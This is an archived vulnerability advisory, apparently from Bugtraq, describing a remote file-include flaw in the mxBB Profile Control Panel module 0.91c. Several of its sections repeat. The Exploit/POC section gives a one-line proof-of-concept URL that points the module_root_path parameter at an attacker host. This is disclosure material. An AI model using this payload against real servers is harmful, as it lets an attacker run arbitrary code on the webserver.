MXBB Profile Control Panel Module Remote File Include Vulnerability
BID:21520
Info
MXBB Profile Control Panel Module Remote File Include Vulnerability
| Bugtraq ID: | 21520 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 09 2006 12:00AM |
| Updated: | Dec 09 2006 12:00AM |
| Credit: | bd0rk and SOH-Crew are credited with the discovery of this vulnerability. |
| Vulnerable: |
mxBB Profile Control Panel 0.91c |
| Not Vulnerable: | |
Discussion
MXBB Profile Control Panel Module Remote File Include Vulnerability
The mxBB profile Control Panel module is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer in the context of the webserver process.
mxBB Profile Control Panel Module version 0.91c is vulnerable to this issue.
The mxBB profile Control Panel module is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer in the context of the webserver process.
mxBB Profile Control Panel Module version 0.91c is vulnerable to this issue.
Exploit / POC
MXBB Profile Control Panel Module Remote File Include Vulnerability
An attacker can exploit this issue via a web client.
The following proof of concept is available:
http://example.com/[directory]/includes/profilcp_constants.php?module_root_path=http://attacker.com
An attacker can exploit this issue via a web client.
The following proof of concept is available:
http://example.com/[directory]/includes/profilcp_constants.php?module_root_path=http://attacker.com
Solution / Fix
MXBB Profile Control Panel Module Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
MXBB Profile Control Panel Module Remote File Include Vulnerability
References:
References:
- Vendor Home Page (mxBB)